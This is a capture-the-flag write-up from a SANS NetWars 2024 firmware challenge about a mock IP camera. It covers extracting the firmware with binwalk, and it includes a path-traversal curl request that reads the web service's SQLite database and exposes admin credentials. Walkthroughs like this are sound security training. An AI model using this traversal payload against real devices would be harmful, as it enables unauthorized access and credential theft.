← Back to blog

TikSight Surveillance (Firmware)

September 8, 2024 · SANS NetWars 2024 firmwareiotbinwalkpath-traversal

Challenge

  • Event: SANS NetWars — Firmware
  • Category: Firmware / IoT
  • Artifact: firmware.bin (TikSight IP camera) + a live web service

Writeup

Extracting the filesystem

The firmware image is carved with binwalk, recursively extracting the embedded filesystems and compressed blobs:

binwalk -Me firmware.bin

This yields a JFFS2 root filesystem. The device’s status file discloses the hardware model:

cat ./_firmware.bin.extracted/jffs2-root/root/app/src/status
--- Model: TikSight Pro
--- Model Identifier: DS-2CD2183G2-IU
--- Hardware UUID: 5FE4BAA6-432D-5992-BD92-53E0DC5470C7
--- OS Loader Version: 580~743

The model identifier disclosed in the status file is DS-2CD2183G2-IU.

From firmware to the live service

The accompanying web service exposes a status endpoint that reflects a file path back to the caller. Because the parameter isn’t constrained, it’s a textbook path traversal — walking out of the web root and back down into the application’s SQLite database:

curl -s 'http://<target>/test/status?elem=../../../../../../../app/instance/db.sqlite' \
  | base64 -d > db.sqlite

Dumping the recovered database reveals the application’s credentials:

sqlite3 db.sqlite .dump
...
INSERT INTO users VALUES(1,'admin','TikSightSeesAll',...,1);

Admin credentials recovered: admin:TikSightSeesAll.